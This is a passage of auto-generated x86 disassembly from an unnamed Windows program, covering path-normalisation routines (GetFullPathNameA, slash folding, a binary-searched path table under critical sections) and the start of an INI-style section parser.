lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_54]
jmp short loc_50145F
; ---------------------------------------------------------------------------
loc_501436: ; CODE XREF: sub_501177+7B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_501441
jmp short loc_50145D
sub_501177 endp
; =============== S U B R O U T I N E =======================================
sub_501441 proc near ; CODE XREF: sub_501177+2C3�p
; DATA XREF: _6:0050E3D0�o
mov eax, ds:dword_5118E4
mov [ebp-44h], eax
cmp dword ptr [ebp-44h], 0
jz short locret_50145C
mov eax, [ebp-44h]
add eax, 10h
push eax
call ds:dword_50E018 ; RtlLeaveCriticalSection
locret_50145C: ; CODE XREF: sub_501441+C�j
retn
sub_501441 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_501177
loc_50145D: ; CODE XREF: sub_501177+5C�j
; sub_501177+2C8�j
xor eax, eax
loc_50145F: ; CODE XREF: sub_501177+D8�j
; sub_501177+2BD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_501177
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_501470 proc near ; CODE XREF: sub_4FF252+91�p
; sub_50153F+B4�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], ecx
mov [ebp+var_4], 1
mov [ebp+var_8], 2
jmp short loc_501490
; ---------------------------------------------------------------------------
loc_501489: ; CODE XREF: sub_501470+5E�j
; sub_501470+7F�j ...
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_501490: ; CODE XREF: sub_501470+17�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_10]
jnb loc_501523
mov eax, ds:dword_511908
add eax, [ebp+var_8]
mov al, [eax+810h]
mov [ebp+var_C], al
movsx eax, [ebp+var_C]
mov ecx, ds:dword_511908
add ecx, [ebp+var_4]
movsx ecx, byte ptr [ecx+810h]
cmp eax, ecx
jnz short loc_5014D0
movsx eax, [ebp+var_C]
cmp eax, 5Ch
jnz short loc_5014D0
jmp short loc_501489
; ---------------------------------------------------------------------------
loc_5014D0: ; CODE XREF: sub_501470+53�j
; sub_501470+5C�j
movsx eax, [ebp+var_C]
cmp eax, 2Fh
jnz short loc_5014F1
mov eax, ds:dword_511908
add eax, [ebp+var_8]
mov byte ptr [eax+810h], 5Ch
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
jmp short loc_501489
; ---------------------------------------------------------------------------
loc_5014F1: ; CODE XREF: sub_501470+67�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
jz short loc_501517
mov eax, ds:dword_511908
add eax, [ebp+var_4]
mov ecx, ds:dword_511908
add ecx, [ebp+var_8]
mov cl, [ecx+810h]
mov [eax+811h], cl
loc_501517: ; CODE XREF: sub_501470+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp loc_501489
; ---------------------------------------------------------------------------
loc_501523: ; CODE XREF: sub_501470+26�j
mov eax, ds:dword_511908
add eax, [ebp+var_4]
and byte ptr [eax+811h], 0
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+var_10]
sub ecx, eax
mov eax, ecx
leave
retn
sub_501470 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50153F proc near ; CODE XREF: sub_4FFD24+3A�p
; sub_500346+19�p ...
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 005018BC SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E3D8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 50h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz short loc_501570
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_501570: ; CODE XREF: sub_50153F+29�j
cmp ds:dword_511908, 0
jnz short loc_501580
xor eax, eax
jmp loc_5018BE
; ---------------------------------------------------------------------------
loc_501580: ; CODE XREF: sub_50153F+38�j
and [ebp+var_1C], 0
push offset dword_5118C8
call ds:dword_5116C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
push 4
push offset a? ; "\\\\?\\"
push [ebp+arg_0]
call sub_4FC730
add esp, 0Ch
test eax, eax
jnz short loc_5015B2
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
loc_5015B2: ; CODE XREF: sub_50153F+68�j
lea eax, [ebp+var_1C]
push eax
mov eax, ds:dword_511908
add eax, 810h
push eax
push 104h
push [ebp+arg_0]
call ds:dword_511708 ; GetFullPathNameA
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz loc_5018A5
push [ebp+var_20]
mov eax, ds:dword_511908
add eax, 810h
push eax
call ds:dword_5117C8 ; CharUpperBuffA
mov ecx, [ebp+var_20]
call sub_501470
mov ecx, [ebp+var_1C]
sub ecx, eax
mov [ebp+var_1C], ecx
mov eax, ds:dword_511908
mov eax, [eax+0C14h]
mov [ebp+var_24], eax
mov eax, ds:dword_511908
mov ecx, [eax+0C14h]
mov edi, ds:dword_511908
add edi, 10h
mov esi, ds:dword_511908
add esi, 810h
xor eax, eax
repe cmpsb
jz short loc_501679
mov eax, ds:dword_511908
mov ecx, [eax+0C18h]
mov edi, ds:dword_511908
add edi, 410h
mov esi, ds:dword_511908
add esi, 810h
xor eax, eax
repe cmpsb
jnz loc_50181A
mov eax, ds:dword_511908
mov eax, [eax+0C18h]
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_50181A
loc_501679: ; CODE XREF: sub_50153F+F3�j
mov eax, [ebp+var_24]
mov ecx, ds:dword_511908
lea eax, [ecx+eax+810h]
mov [ebp+var_28], eax
mov edi, [ebp+var_28]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_34], ecx
mov [ebp+var_38], 1
mov eax, ds:dword_511908
mov eax, [eax+0Ch]
mov [ebp+var_2C], eax
and [ebp+var_30], 0
loc_5016B2: ; CODE XREF: sub_50153F:loc_501752�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_2C]
ja loc_501757
mov eax, [ebp+var_38]
add eax, [ebp+var_2C]
shr eax, 1
mov [ebp+var_44], eax
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
mov eax, [ecx+eax]
mov [ebp+var_3C], eax
push [ebp+var_34]
mov eax, [ebp+var_3C]
push dword ptr [eax]
push [ebp+var_28]
call sub_4FC730
add esp, 0Ch
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jnz short loc_50173C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
test eax, eax
jz short loc_50171C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov ecx, [ebp+var_34]
movsx eax, byte ptr [eax+ecx]
cmp eax, 5Ch
jnz short loc_501733
loc_50171C: ; CODE XREF: sub_50153F+1CA�j
mov eax, [ebp+var_44]
dec eax
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
add ecx, eax
mov [ebp+var_30], ecx
jmp short loc_501757
; ---------------------------------------------------------------------------
loc_501733: ; CODE XREF: sub_50153F+1DB�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
jmp short loc_501752
; ---------------------------------------------------------------------------
loc_50173C: ; CODE XREF: sub_50153F+1BA�j
cmp [ebp+var_40], 0
jle short loc_50174B
mov eax, [ebp+var_44]
inc eax
mov [ebp+var_38], eax
jmp short loc_501752
; ---------------------------------------------------------------------------
loc_50174B: ; CODE XREF: sub_50153F+201�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
loc_501752: ; CODE XREF: sub_50153F+1FB�j
; sub_50153F+20A�j
jmp loc_5016B2
; ---------------------------------------------------------------------------
loc_501757: ; CODE XREF: sub_50153F+179�j
; sub_50153F+1F2�j
cmp [ebp+var_30], 0
jz loc_501815
cmp [ebp+arg_4], 0
jz short loc_50176F
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov [eax], ecx
loc_50176F: ; CODE XREF: sub_50153F+226�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_28]
mov [ebp+var_54], eax
loc_50177F: ; CODE XREF: sub_50153F+272�j
mov eax, [ebp+var_54]
mov al, [eax]
mov [ebp+var_55], al
mov ecx, [ebp+var_50]
cmp al, [ecx]
jnz short loc_5017B9
cmp [ebp+var_55], 0
jz short loc_5017B3
mov eax, [ebp+var_54]
mov al, [eax+1]
mov [ebp+var_56], al
mov ecx, [ebp+var_50]
cmp al, [ecx+1]
jnz short loc_5017B9
add [ebp+var_54], 2
add [ebp+var_50], 2
cmp [ebp+var_56], 0
jnz short loc_50177F
loc_5017B3: ; CODE XREF: sub_50153F+253�j
and [ebp+var_5C], 0
jmp short loc_5017C1
; ---------------------------------------------------------------------------
loc_5017B9: ; CODE XREF: sub_50153F+24D�j
; sub_50153F+264�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_5C], eax
loc_5017C1: ; CODE XREF: sub_50153F+278�j
mov eax, [ebp+var_5C]
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jnz short loc_5017D5
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
jmp short loc_5017DB
; ---------------------------------------------------------------------------
loc_5017D5: ; CODE XREF: sub_50153F+28C�j
mov eax, [ebp+arg_8]
mov byte ptr [eax], 1
loc_5017DB: ; CODE XREF: sub_50153F+294�j
cmp [ebp+arg_C], 0
jz short loc_5017FA
push 0
mov eax, ds:dword_511908
add eax, 810h
push eax
call sub_5092CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_5017FA: ; CODE XREF: sub_50153F+2A0�j
push 0FFFFFFFFh
mov eax, [ebp+var_30]
mov [ebp+var_64], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_5018BE
; ---------------------------------------------------------------------------
loc_501815: ; CODE XREF: sub_50153F+21C�j
jmp loc_5018A5
; ---------------------------------------------------------------------------
loc_50181A: ; CODE XREF: sub_50153F+11C�j
; sub_50153F+134�j
push [ebp+var_1C]
call sub_508A16
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_5018A5
mov eax, ds:dword_511908
mov eax, [eax+8]
cmp eax, [ebp+var_48]
ja short loc_5018A5
mov eax, ds:dword_511908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_511908
mov ecx, [ecx+8]
add ecx, eax
cmp [ebp+var_48], ecx
jnb short loc_5018A5
mov eax, [ebp+var_48]
mov [ebp+var_4C], eax
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
cmp [ebp+arg_C], 0
jz short loc_50187F
push 0
mov eax, ds:dword_511908
add eax, 810h
push eax
call sub_5092CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_50187F: ; CODE XREF: sub_50153F+325�j
cmp [ebp+arg_4], 0
jz short loc_50188D
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4C]
mov [eax], ecx
loc_50188D: ; CODE XREF: sub_50153F+344�j
push 0FFFFFFFFh
mov eax, [ebp+var_48]
mov [ebp+var_68], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp short loc_5018BE
; ---------------------------------------------------------------------------
loc_5018A5: ; CODE XREF: sub_50153F+97�j
; sub_50153F:loc_501815�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_5018B0
jmp short loc_5018BC
sub_50153F endp
; =============== S U B R O U T I N E =======================================
sub_5018B0 proc near ; CODE XREF: sub_50153F+36A�p
; DATA XREF: _6:0050E3E0�o
push offset dword_5118C8
call ds:dword_511754 ; RtlLeaveCriticalSection
retn
sub_5018B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_50153F
loc_5018BC: ; CODE XREF: sub_50153F+36F�j
xor eax, eax
loc_5018BE: ; CODE XREF: sub_50153F+3C�j
; sub_50153F+2D1�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_50153F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5018CF proc near ; CODE XREF: sub_50AAEB+16�p
; sub_50AB3D+97�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
and [ebp+var_C], 0
and [ebp+var_8], 0
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_50153F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_5019C6
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_5019C6
cmp [ebp+var_8], 0
jz loc_5019C6
mov eax, [ebp+var_8]
mov edi, [eax+4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_10], ecx
mov eax, ds:dword_511908
mov eax, [eax+0C14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+1]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_8]
jle short loc_50194F
mov eax, [ebp+var_14]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_5019C1
; ---------------------------------------------------------------------------
loc_50194F: ; CODE XREF: sub_5018CF+73�j
mov eax, ds:dword_511908
mov ecx, [eax+0C14h]
mov esi, ds:dword_511908
add esi, 10h
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_10]
mov eax, [ebp+var_8]
mov esi, [eax+4]
mov eax, ds:dword_511908
mov edi, [ebp+arg_4]
add edi, [eax+0C14h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, ds:dword_511908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_4]
and byte ptr [ecx+eax], 0
mov eax, ds:dword_511908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_5019C1: ; CODE XREF: sub_5018CF+7E�j
push 1
pop eax
jmp short loc_5019CE
; ---------------------------------------------------------------------------
loc_5019C6: ; CODE XREF: sub_5018CF+29�j
; sub_5018CF+35�j ...
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
xor eax, eax
loc_5019CE: ; CODE XREF: sub_5018CF+F5�j
pop edi
pop esi
leave
retn
sub_5018CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5019D2 proc near ; CODE XREF: sub_50581E+3D�p
; sub_50A1C7+29�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00501A9F SIZE 00000043 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E3E8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_30]
call sub_50153F
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz loc_501A9F
cmp [ebp+arg_0], 0
jz short loc_501A9F
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_30]
call sub_5092CA
pop ecx
pop ecx
mov edx, eax
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
mov edx, edi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov [ebp+var_24], edx
and [ebp+var_4], 0
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_24]
call sub_50153F
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_501A8F
jmp short loc_501A9F
sub_5019D2 endp
; =============== S U B R O U T I N E =======================================
sub_501A8F proc near ; CODE XREF: sub_5019D2+B6�p
; DATA XREF: _6:0050E3F0�o
mov eax, [ebp-24h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_5083DD
pop ecx
retn
sub_501A8F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_5019D2
loc_501A9F: ; CODE XREF: sub_5019D2+43�j
; sub_5019D2+4D�j ...
cmp [ebp+var_1C], 0
jz short loc_501AB2
movzx eax, [ebp+var_20]
test eax, eax
jnz short loc_501AB2
mov eax, [ebp+var_1C]
jmp short loc_501AD1
; ---------------------------------------------------------------------------
loc_501AB2: ; CODE XREF: sub_5019D2+D1�j
; sub_5019D2+D9�j
cmp [ebp+var_34], 0
jz short loc_501ACF
cmp [ebp+var_1C], 0
jz short loc_501ACF
mov eax, [ebp+var_34]
mov eax, [eax]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_5083DD
pop ecx
loc_501ACF: ; CODE XREF: sub_5019D2+E4�j
; sub_5019D2+EA�j
xor eax, eax
loc_501AD1: ; CODE XREF: sub_5019D2+DE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_5019D2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_501AE2 proc near ; CODE XREF: sub_50581E+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_28], edx
mov [ebp+var_24], ecx
and [ebp+var_8], 0
cmp [ebp+var_24], 0
jz loc_501BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz loc_501BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jz loc_501BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax+1]
cmp eax, 3Ah
jz loc_501BBB
mov edi, [ebp+var_24]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_14], ecx
mov eax, ds:dword_511908
add eax, 10h
mov ecx, ds:dword_511908
mov ecx, [ecx+0C10h]
sub ecx, eax
mov [ebp+var_10], ecx
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_14]
lea eax, [eax+ecx+104h]
push eax
call sub_50835A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov esi, ds:dword_511908
add esi, 10h
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
inc ecx
mov esi, [ebp+var_24]
mov edi, [ebp+var_8]
add edi, [ebp+var_10]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
loc_501BBB: ; CODE XREF: sub_501AE2+17�j
; sub_501AE2+26�j ...
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_24]
call sub_50153F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_501C41
cmp [ebp+arg_0], 0
jz short loc_501C41
cmp [ebp+var_8], 0
jnz short loc_501BFB
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_24]
call sub_5092CA
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_501BFB: ; CODE XREF: sub_501AE2+FC�j
mov edi, [ebp+arg_0]
mov edx, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_8]
call sub_50153F
mov [ebp+var_4], eax
loc_501C41: ; CODE XREF: sub_501AE2+F0�j
; sub_501AE2+F6�j
cmp [ebp+var_4], 0
jz short loc_501C90
movzx eax, [ebp+var_C]
test eax, eax
jnz short loc_501C90
cmp [ebp+var_28], 0
jz short loc_501C7C
cmp [ebp+var_8], 0
jz short loc_501C63
mov eax, [ebp+var_8]
mov [ebp+var_2C], eax
jmp short loc_501C72
; ---------------------------------------------------------------------------
loc_501C63: ; CODE XREF: sub_501AE2+177�j
push 0
push [ebp+var_24]
call sub_5092CA
pop ecx
pop ecx
mov [ebp+var_2C], eax
loc_501C72: ; CODE XREF: sub_501AE2+17F�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov [eax], ecx
jmp short loc_501C8B
; ---------------------------------------------------------------------------
loc_501C7C: ; CODE XREF: sub_501AE2+171�j
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_5083DD
pop ecx
loc_501C8B: ; CODE XREF: sub_501AE2+198�j
mov eax, [ebp+var_4]
jmp short loc_501CA1
; ---------------------------------------------------------------------------
loc_501C90: ; CODE XREF: sub_501AE2+163�j
; sub_501AE2+16B�j
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_5083DD
pop ecx
xor eax, eax
loc_501CA1: ; CODE XREF: sub_501AE2+1AC�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_501AE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_501CA8 proc near ; CODE XREF: sub_50A7AF+A�p
; sub_50A7DD+78�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
push 0
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_50153F
leave
retn
sub_501CA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_501CC4 proc near ; CODE XREF: sub_50AC66+2B�p
; sub_50AD0C+42�p ...
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
; FUNCTION CHUNK AT 005021B6 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E3F8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 64h
push ebx
push esi
push edi
and [ebp+var_34], 0
and [ebp+var_28], 0
and [ebp+var_38], 0
and [ebp+var_20], 0
and [ebp+var_30], 0
and [ebp+var_3C], 0
and [ebp+var_24], 0
and [ebp+var_48], 0
and [ebp+var_40], 0
and [ebp+var_44], 0
and [ebp+var_4], 0
mov ecx, [ebp+arg_10]
xor eax, eax
mov edi, [ebp+arg_C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 0
lea eax, [ebp+var_2C]
push eax
push 0
push 0
push [ebp+arg_14]
call sub_500346
lea eax, [ebp+var_28]
push eax
push [ebp+var_2C]
call sub_500672
mov eax, [ebp+var_28]
inc eax
push eax
call sub_50835A
pop ecx
mov [ebp+var_64], eax
mov eax, [ebp+var_64]
mov [ebp+var_34], eax
mov ecx, [ebp+var_28]
inc ecx
xor eax, eax
mov edi, [ebp+var_34]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
lea eax, [ecx+eax+1]
mov [ebp+var_20], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
lea eax, [ebp+var_1C]
push eax
push 0
push 0
push [ebp+var_28]
push [ebp+var_34]
push [ebp+var_2C]
call sub_501177
mov eax, [ebp+var_20]
mov byte ptr [eax-1], 0Ah
jmp short loc_501DAD
; ---------------------------------------------------------------------------
loc_501DA6: ; CODE XREF: sub_501CC4:loc_502184�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_501DAD: ; CODE XREF: sub_501CC4+E0�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz loc_502189
loc_501DB9: ; CODE XREF: sub_501CC4+486�j
; sub_501CC4+4BB�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Bh
jnz short loc_501DF8
loc_501DC4: ; CODE XREF: sub_501CC4+125�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz short loc_501DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_501DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_501DEB
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_501DC4
; ---------------------------------------------------------------------------
loc_501DEB: ; CODE XREF: sub_501CC4+106�j
; sub_501CC4+111�j ...
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jnz short loc_501DF8
jmp loc_502189
; ---------------------------------------------------------------------------
loc_501DF8: ; CODE XREF: sub_501CC4+FE�j
; sub_501CC4+12D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Bh
jnz short loc_501E16
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_30], eax
mov [ebp+var_24], 1
jmp loc_502184
; ---------------------------------------------------------------------------
loc_501E16: ; CODE XREF: sub_501CC4+13D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Dh
jnz loc_501EBF
loc_501E25: ; CODE XREF: sub_501CC4+217�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
cmp [ebp+var_24], 1
jnz loc_501EBA
and [ebp+var_24], 0
cmp [ebp+arg_0], 0
jnz short loc_501EA0
mov eax, [ebp+var_44]
mov [ebp+var_4C], eax
mov edi, [ebp+var_30]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_54], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_4C]
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jle short loc_501E9E
push [ebp+var_50]
push [ebp+var_30]
mov eax, [ebp+arg_C]
add eax, [ebp+var_4C]
push eax
call sub_4FC770
add esp, 0Ch
mov eax, [ebp+var_50]
cmp eax, [ebp+var_54]
jle short loc_501E8B
mov eax, [ebp+var_54]
mov [ebp+var_74], eax
jmp short loc_501E91
; ---------------------------------------------------------------------------
loc_501E8B: ; CODE XREF: sub_501CC4+1BD�j
mov eax, [ebp+var_50]
